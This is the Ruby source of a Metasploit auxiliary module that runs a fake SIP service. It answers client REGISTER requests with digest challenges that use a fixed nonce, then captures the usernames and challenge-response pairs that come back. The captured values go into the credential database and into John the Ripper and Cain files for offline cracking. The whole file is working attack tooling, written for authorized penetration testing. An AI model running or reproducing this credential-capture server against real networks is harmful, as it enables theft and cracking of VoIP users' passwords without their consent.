##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/socket'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'           => 'Authentication Capture: SIP',
      'Description'    => %q{
        This module provides a fake SIP service that is designed to
        capture authentication credentials. It captures	challenge and
        response pairs that can be supplied to Cain or JtR for cracking.
      },
      'Author'         => 'Patrik Karlsson <patrik[at]cqure.net>',
      'License'        => MSF_LICENSE,
      'Actions'        => [ [ 'Capture' ] ],
      'PassiveActions' => [ 'Capture' ],
      'DefaultAction'  => 'Capture'
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 5060 ]),
        OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
        OptString.new('NONCE', [ true, "The server byte nonce", "1234" ]),
        OptString.new('JOHNPWFILE',  [ false, "The prefix to the local filename to store the hashes in JOHN format", nil ]),
        OptString.new('CAINPWFILE',  [ false, "The local filename to store the hashes in Cain&Abel format", nil ]),
      ], self.class)
    register_advanced_options(
      [
        OptString.new("SRVVERSION", [ true, "The server version to report in the greeting response", "ser (3.3.0-pre1 (i386/linux))" ]),
        OptString.new('REALM', [false, "The SIP realm to which clients authenticate", nil ]),
      ], self.class)
  end

  def sip_parse_authorization(data)
    kvps = {}
    kvps['scheme'] = data.slice!(0, data.index(' '))
    data.split(/,\s?/).each do | item |
      tokens = item.scan(/^\s?([^=]*)=\"?(.*?)\"?$/)[0]
      kvps[tokens[0]] = tokens[1]
    end
    kvps
  end

  def sip_parse_request(data)
    response = {
      :headers_raw => [],
      :headers => {},
      :uri => nil,
      :method => nil,
      :protocol => nil
    }
    status = data.slice!(0, data.index(/\r?\n/)+1).split(/\s/)
    response[:method] = status[0]
    response[:uri] = status[1]
    response[:protocol] = status[2]

    while data.index(/\r?\n/)
      header = (data.slice!(0, data.index(/\r?\n/)+1)).chomp
      response[:headers_raw] << header
      key, val = header.split(/:\s*/, 2)
      response[:headers][key] = val
    end
    response
  end

  def sip_send_error_message(request, code, msg)
    ip = @requestor[:ip]
    port = @requestor[:port]
    tag = (0...8).map{65.+(rand(25)).chr}.join
    nonce = datastore['NONCE']
    realm = datastore['REALM'] ? datastore['REALM'] : sip_sanitize_address(ip)
    auth = []

    auth << "SIP/2.0 #{code} #{msg}"
    auth << ("Via: #{request[:headers]['Via']};received=#{ip}").gsub("rport", "rport=#{port}")
    auth << "From: #{request[:headers]['From']}"
    auth << "To: #{request[:headers]['To']};tag=#{tag}"
    auth << "Call-ID: #{request[:headers]['Call-ID']}"
    auth << "CSeq: #{request[:headers]['CSeq']}"
    auth << "Expires: 600"
    auth << "Min-Expires: 240"
    auth << "WWW-Authenticate: Digest realm=\"#{realm}\", nonce=\"#{nonce}\""
    auth << "Server: #{datastore['SRVVERSION']}"
    auth << "Content-Length: 0"
    auth << ""

    @sock.sendto(auth.join("\r\n") << "\r\n", @requestor[:ip].to_s, @requestor[:port])
  end

  # removes any leading ipv6 stuff, such as ::ffff: as it breaks JtR
  def sip_sanitize_address(addr)
    if ( addr =~ /:/ )
      return addr.scan(/.*:(.*)/)[0][0]
    end
    return addr
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def run
    begin
      @port = datastore['SRVPORT'].to_i
      @sock = Rex::Socket::Udp.create(
            'LocalHost' => datastore['SRVHOST'],
            'LocalPort' => @port,
            'Context'   => {'Msf' => framework, 'MsfExploit' => self} )
      @run = true
      server_ip = sip_sanitize_address(datastore['SRVHOST'])

      while @run
        res = @sock.recvfrom()
        @requestor = {
          :ip => res[1],
          :port => res[2]
        }
        client_ip = sip_sanitize_address(res[1])
        next if not res[0] or res[0].empty?
        request = sip_parse_request(res[0])
        method = request[:method]

        case method
        when "REGISTER"
          authorization = ( request[:headers]['Authorization'] ? request[:headers]['Authorization'] : request[:headers]['Proxy-Authorization'] )
          if authorization
            if ( request[:uri] =~ /^sip:.*?:\d+/ )
              # current versions of the JtR plugin will fail cracking SIP uri:s containing a port; eg. sip:1.2.3.4:5060
              print_status("URI with port detected in authorization SIP request, JtR may fail to crack the response")
            end

            auth_tokens = sip_parse_authorization(authorization)
            response = ( auth_tokens['response'] ? auth_tokens['response'] : "" )
            algorithm= ( auth_tokens['algorithm'] ? auth_tokens['algorithm'] : "MD5" )
            username = auth_tokens['username']
            proof = "client: #{client_ip}; username: #{username}; nonce: #{datastore['NONCE']}; response: #{response}; algorithm: #{algorithm}"
            print_status("SIP LOGIN: #{proof}")

            report_cred(
              ip: @requestor[:ip],
              port: @requestor[:port],
              service_name: 'sip_client',
              user: username,
              password: response + ":" + auth_tokens['nonce'] + ":" + algorithm,
              proof: proof
            )

            if datastore['JOHNPWFILE']
              resp = []
              resp << "$sip$"
              resp << server_ip
              resp << client_ip
              resp << username
              resp << auth_tokens['realm']
              resp << method
              resp << "sip"
              resp << request[:uri].scan(/^.*?:(.*)$/)
              resp << auth_tokens['nonce']
              resp << ( auth_tokens['cnonce'] ? auth_tokens['cnonce'] : "" )
              resp << ( auth_tokens['nc'] ? auth_tokens['nc'] : "" )
              resp << ( auth_tokens['qop'] ? auth_tokens['qop'] : "" )
              resp << algorithm
              resp << response

              fd = File.open(datastore['JOHNPWFILE'] + '_sip' , "ab")
              fd.puts(username + ":" + resp.join("*"))
              fd.close
            end

            if datastore['CAINPWFILE']
              resp = []
              resp << auth_tokens['realm']
              resp << auth_tokens['username']
              resp << ""
              resp << request[:uri]
              resp << auth_tokens['nonce']
              resp << response
              resp << method
              resp << algorithm

              fd = File.open(datastore['CAINPWFILE'], "ab")
              fd.puts resp.join("\t") + "\r\n"
              fd.close
            end

            sip_send_error_message(request, 401, "Unauthorized")
          else
            sip_send_error_message(request, 401, "Unauthorized")
          end
        when "ACK"
          # do nothing
        else
          print_error("Unhandled method: #{request[:method]}")
          sip_send_error_message(request, 401, "Unauthorized")
        end
      end

    rescue ::Interrupt
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
      nil
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e.backtrace}")
    ensure
      @sock.close
    end
  end
end